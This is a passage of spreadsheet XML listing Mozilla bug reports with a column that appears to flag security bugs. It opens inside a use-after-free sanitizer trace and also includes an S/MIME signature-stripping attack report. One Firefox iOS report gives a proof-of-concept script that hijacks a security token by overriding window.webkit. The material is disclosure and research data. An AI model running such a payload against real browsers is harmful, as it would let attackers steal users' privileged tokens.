    #7 0x7f83db18c42a in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring&lt;char16_t&gt; const&amp;, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2615:10
    #8 0x7f83dd10d58d in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:889:12
    #9 0x7f83dd10d58d in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:884
    #10 0x7f83dd10d58d in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1645
    #11 0x7f83dd10d58d in SetHTMLAttr /builds/worker/workspace/build/src/dom/html/nsGenericHTMLElement.h:814
    #12 0x7f83dd10d58d in SetType /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLInputElement.h:738
    #13 0x7f83dd10d58d in mozilla::dom::HTMLInputElementBinding::set_type(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2470
    #14 0x7f83dd3ae439 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2997:8
    #15 0x7f83e3df6a34 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #16 0x7f83e3df6a34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #17 0x7f83e3df9186 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #18 0x7f83e3df9186 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #19 0x7f83e3df9186 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:670
    #20 0x7f83e4ea037c in SetExistingProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2736:10
    #21 0x7f83e4e9679c in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2764:20
    #22 0x7f83e3dda04a in SetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1637:12
    #23 0x7f83e3dda04a in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:270
    #24 0x7f83e3dda04a in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2893
    #25 0x7f83e3dc8410 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f83e3df6f6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f83e3df7a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f83e48dda6c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3029:12
    #29 0x7f83dccfe65e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #30 0x7f83dd8a293a in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #31 0x7f83dd8a293a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #32 0x7f83dd869121 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #33 0x7f83dd86b032 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #34 0x7f83dd854a33 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:520:14
    #35 0x7f83dd8581b8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
    #36 0x7f83dd85a0cc in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:932:12
    #37 0x7f83db49a3bf in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1359:5
    #38 0x7f83daf9850e in nsContentUtils::DispatchEvent(nsIDocument*, nsISupports*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool*, bool) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4506:18
    #39 0x7f83daf982c4 in nsContentUtils::DispatchTrustedEvent(nsIDocument*, nsISupports*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4474:10
    #40 0x7f83db23db58 in mozilla::dom::Selection::AddItem(nsRange*, int*, bool) /builds/worker/workspace/build/src/dom/base/Selection.cpp:1130:11
    #41 0x7f83db2532c0 in mozilla::dom::Selection::AddRangeInternal(nsRange&amp;, nsIDocument*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/Selection.cpp:2359:14
    #42 0x7f83db252cc4 in AddRange /builds/worker/workspace/build/src/dom/base/Selection.cpp:2325:10
    #43 0x7f83db252cc4 in mozilla::dom::Selection::AddRange(nsIDOMRange*) /builds/worker/workspace/build/src/dom/base/Selection.cpp:2310
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4ef79d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7f83ddc9b70a in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:159:12
    #3 0x7f83ddc9b70a in nsTextEditorState::Construct(nsITextControlElement*, nsTextEditorState**) /builds/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1179
    #4 0x7f83ddad66ce in mozilla::dom::HTMLInputElement::HTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;, mozilla::dom::FromParser, mozilla::dom::HTMLInputElement::FromClone) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1159:5
    #5 0x7f83ddac7aec in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:124:1
    #6 0x7f83ddc61b2d in CreateHTMLElement(unsigned int, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:254:41
    #7 0x7f83dafcc73a in nsContentUtils::NewXULOrHTMLElement(mozilla::dom::Element**, mozilla::dom::NodeInfo*, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:10110:18
    #8 0x7f83ddc61a88 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:237:10
    #9 0x7f83db4e94be in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsTSubstring&lt;char16_t&gt; const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:183:12
    #10 0x7f83db3c78d1 in nsDocument::CreateElem(nsTSubstring&lt;char16_t&gt; const&amp;, nsAtom*, int, nsTSubstring&lt;char16_t&gt; const*) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8506:17
    #11 0x7f83db3ae577 in nsDocument::CreateElement(nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5946:26
    #12 0x7f83dcd45d9c in mozilla::dom::DocumentBinding::createElement(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1229:59
    #13 0x7f83dd3aed87 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
    #14 0x7f83e3df6a34 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #15 0x7f83e3df6a34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #16 0x7f83e3de1a66 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #17 0x7f83e3de1a66 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
    #18 0x7f83e3dc8410 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #19 0x7f83e3df6f6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #20 0x7f83e3df7a92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #21 0x7f83e48dda6c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3029:12
    #22 0x7f83dccfe65e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #23 0x7f83dd8a293a in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #24 0x7f83dd8a293a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #25 0x7f83dd869121 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
    #26 0x7f83dd86b032 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
    #27 0x7f83dd854792 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:496:16
    #28 0x7f83dd8581b8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
    #29 0x7f83dfd40f78 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1072:7
    #30 0x7f83e307354d in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7259:21
    #31 0x7f83e306f5fa in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7052:7
    #32 0x7f83e307726f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #33 0x7f83da108837 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1319:3
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1799:10 in nsTextEditorState::SetSelectionRange(unsigned int, unsigned int, nsITextControlFrame::SelectionDirection, mozilla::ErrorResult&amp;)
Shadow bytes around the buggy address:
  0x0c18800470c0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c18800470d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c18800470e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c18800470f0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1880047100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0</t>
        </is>
      </c>
      <c r="X2117" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" t="n">
        <v>1420349</v>
      </c>
      <c r="B2118" t="inlineStr">
        <is>
          <t>2017-11-23 22:26:13 -0800</t>
        </is>
      </c>
      <c r="C2118" t="inlineStr">
        <is>
          <t>this.scheduler is undefined forcing sync very early after startup</t>
        </is>
      </c>
      <c r="D2118" t="inlineStr">
        <is>
          <t>2017-11-29 17:24:07 -0800</t>
        </is>
      </c>
      <c r="E2118" t="n">
        <v>1</v>
      </c>
      <c r="F2118" t="n">
        <v>1</v>
      </c>
      <c r="G2118" t="n">
        <v>2</v>
      </c>
      <c r="H2118" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2118" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2118" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2118" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2118" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2118" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2118" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2118" t="inlineStr"/>
      <c r="Q2118" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2118" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2118" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T2118" t="n">
        <v>1</v>
      </c>
      <c r="U2118" t="n">
        <v>0</v>
      </c>
      <c r="V2118" t="n">
        <v>9</v>
      </c>
      <c r="W2118" t="inlineStr">
        <is>
          <t>Immediately after starting up I hit "sync now" and saw in the log:
&gt; 1511503477891	Sync.Service	DEBUG	Exception calling anonymous function: TypeError: this.scheduler is undefined (resource://services-sync/service.js:1047:12) JS Stack trace: _shouldLogin@service.js:1047:12 &lt; sync/&lt;@service.js:1091:11 &lt; async*WrappedCatch@util.js:99:22 &lt; async*sync@service.js:1089:12 &lt; async*syncAndReportErrors/&lt;@policies.js:821:7
this.scheduler is setup in onStartup, which is async. I suspect something that should be awaiting that isn't. I'm out of time to dig further but thought I'd get this on file anyway...</t>
        </is>
      </c>
      <c r="X2118" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" t="n">
        <v>745254</v>
      </c>
      <c r="B2119" t="inlineStr">
        <is>
          <t>2012-04-13 10:49:17 -0700</t>
        </is>
      </c>
      <c r="C2119" t="inlineStr">
        <is>
          <t>Security UI needs to stop assuming that bytes transferred == bytes rendered</t>
        </is>
      </c>
      <c r="D2119" t="inlineStr">
        <is>
          <t>2012-07-13 03:21:54 -0700</t>
        </is>
      </c>
      <c r="E2119" t="n">
        <v>1</v>
      </c>
      <c r="F2119" t="n">
        <v>1</v>
      </c>
      <c r="G2119" t="n">
        <v>3</v>
      </c>
      <c r="H2119" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2119" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2119" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2119" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2119" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2119" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2119" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2119" t="inlineStr">
        <is>
          <t>[sg:high][qa!][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2119" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2119" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2119" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T2119" t="n">
        <v>1</v>
      </c>
      <c r="U2119" t="n">
        <v>0</v>
      </c>
      <c r="V2119" t="n">
        <v>30</v>
      </c>
      <c r="W2119" t="inlineStr">
        <is>
          <t>It's quite possible for data to be transferred but not rendered (e.g. when stream converters of any sort, including the unknown decoder, are involved).
The security UI code will treat data being transferred as a signal to update security state.
This means it's possible to leave the browser rendering page A while the security UI shows the state for page B.  This is obviously bad.
Bug 714631 had a specific instance of this that I papered over, but this is a general problem that needs fixing.  If we need to expose more information from docshell or necko or the DOM to the security UI, we should just do that as needed!</t>
        </is>
      </c>
      <c r="X2119" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" t="n">
        <v>1240290</v>
      </c>
      <c r="B2120" t="inlineStr">
        <is>
          <t>2016-01-16 06:31:00 -0800</t>
        </is>
      </c>
      <c r="C2120" t="inlineStr">
        <is>
          <t>Susceptibility to S/MIME Message Takeover Attacks</t>
        </is>
      </c>
      <c r="D2120" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:29 -0700</t>
        </is>
      </c>
      <c r="E2120" t="n">
        <v>1</v>
      </c>
      <c r="F2120" t="n">
        <v>1</v>
      </c>
      <c r="G2120" t="n">
        <v>3</v>
      </c>
      <c r="H2120" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2120" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2120" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K2120" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2120" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2120" t="inlineStr">
        <is>
          <t>[fixes an undetected scenario from efail][fixes handling of multiple layers]</t>
        </is>
      </c>
      <c r="Q2120" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2120" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2120" t="inlineStr">
        <is>
          <t>Thunderbird 71.0</t>
        </is>
      </c>
      <c r="T2120" t="n">
        <v>1</v>
      </c>
      <c r="U2120" t="n">
        <v>0</v>
      </c>
      <c r="V2120" t="n">
        <v>120</v>
      </c>
      <c r="W2120" t="inlineStr">
        <is>
          <t>Created attachment 8708683
thb_mta.pdf
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20160106234230
Steps to reproduce:
Thunderbird is susceptible to a new form of attack which builds on a flaw in the S/MIME standard. 
When Alice sends a signed-then-encrypted (standard format of today's mail clients) mail to Bob, Eve blocks that mail, strips off the signature, replaces it with her own signature and sends it to Bob. Bob now believes the message originates from Eve. If he replies, he potentially discloses information to Eve. Other attack goals are also feasible. See the attachment for details.
Actual results:
Thunderbird displayed the message as validly signed.
Expected results:
Display of an incorrect signature and suspected attack, with the urge not to respond to the email. Ideally, the contents of the mail are not even displayed.</t>
        </is>
      </c>
      <c r="X2120" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" t="n">
        <v>1274171</v>
      </c>
      <c r="B2121" t="inlineStr">
        <is>
          <t>2016-05-19 00:18:16 -0700</t>
        </is>
      </c>
      <c r="C2121" t="inlineStr">
        <is>
          <t>Track presence data of participants in firebase</t>
        </is>
      </c>
      <c r="D2121" t="inlineStr">
        <is>
          <t>2016-06-02 15:20:31 -0700</t>
        </is>
      </c>
      <c r="E2121" t="n">
        <v>1</v>
      </c>
      <c r="F2121" t="n">
        <v>1</v>
      </c>
      <c r="G2121" t="n">
        <v>6</v>
      </c>
      <c r="H2121" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2121" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J2121" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K2121" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2121" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2121" t="inlineStr">
        <is>
          <t>[akita-alpha]</t>
        </is>
      </c>
      <c r="Q2121" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2121" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2121" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2121" t="n">
        <v>1</v>
      </c>
      <c r="U2121" t="n">
        <v>0</v>
      </c>
      <c r="V2121" t="n">
        <v>6</v>
      </c>
      <c r="W2121" t="inlineStr">
        <is>
          <t>Not sure if it'll need a separate presence type or be part of the participants record that gets periodically updated. Probably will have close interactions with bug 1274168 for participants.</t>
        </is>
      </c>
      <c r="X2121" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" t="n">
        <v>1632387</v>
      </c>
      <c r="B2122" t="inlineStr">
        <is>
          <t>2020-04-22 22:02:51 -0700</t>
        </is>
      </c>
      <c r="C2122" t="inlineStr">
        <is>
          <t>Firefox iOS Security Token Hijack By Overriding window.webkit</t>
        </is>
      </c>
      <c r="D2122" t="inlineStr">
        <is>
          <t>2024-05-30 10:13:50 -0700</t>
        </is>
      </c>
      <c r="E2122" t="n">
        <v>1</v>
      </c>
      <c r="F2122" t="n">
        <v>1</v>
      </c>
      <c r="G2122" t="n">
        <v>2</v>
      </c>
      <c r="H2122" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2122" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2122" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2122" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2122" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2122" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q2122" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2122" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2122" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2122" t="n">
        <v>1</v>
      </c>
      <c r="U2122" t="n">
        <v>0</v>
      </c>
      <c r="V2122" t="n">
        <v>12</v>
      </c>
      <c r="W2122" t="inlineStr">
        <is>
          <t>Created attachment 9142622
firefox-reader.html
Firefox Version: v24.1
OS: iOS 13.3.1
Issue: Firefox iOS Security Token Hijack By Overriding window.webkit 
Description:
Firefox iOS uses window.webkit.messageHandlers to communicate between WKWebView and ViewController and this communication is now protected by SECUIRTY_TOKEN(UUID).
But in WKWebView A web page can override |window.webkit| with any value(overriding). The below code would get the SECURITY_TOKEN to attacker controlled page when user visit's attacker's site.
```
&lt;script type="text/javascript"&gt;
    function getToken(msg) {
        alert(msg.securityToken);
        originalWebkit.messageHandlers.readerModeMessageHandler.postMessage(msg);
    }
    originalWebkit = webkit;
    webkit = {};
    webkit.messageHandlers = {};
    webkit.messageHandlers.readerModeMessageHandler = {};
    webkit.messageHandlers.readerModeMessageHandler.postMessage = getToken;
&lt;/script&gt;
```    
POC:
* Open https://vinothkumar.tech/firefox-reader your iOS firefox browser.
* Alert popup trigered with SECURITY_TOKEN
Root Cause:
A web page can override |window.webkit| with any value.
Fix:
Deleting the object ensures that original and working implementation of window.webkit is restored.
```
var oldWebkit = window.webkit;
delete window['webkit'];
window.webkit.messageHandlers[handlerName].postMessage(message);
window.webkit = oldWebkit;
```</t>
        </is>
      </c>
      <c r="X2122" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" t="n">
        <v>123930</v>
      </c>
      <c r="B2123" t="inlineStr">
        <is>
          <t>2002-02-06 12:53:45 -0800</t>
        </is>
      </c>
      <c r="C2123" t="inlineStr">
        <is>
          <t>rt-&gt;scopeSharingDone/LockScope deadlock</t>
        </is>
      </c>
      <c r="D2123" t="inlineStr">
        <is>
          <t>2002-02-08 17:08:42 -0800</t>
        </is>
      </c>
      <c r="E2123" t="n">
        <v>1</v>
      </c>
      <c r="F2123" t="n">
        <v>1</v>
      </c>
      <c r="G2123" t="n">
        <v>3</v>
      </c>
      <c r="H2123" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2123" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2123" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2123" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2123" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2123" t="inlineStr">
        <is>
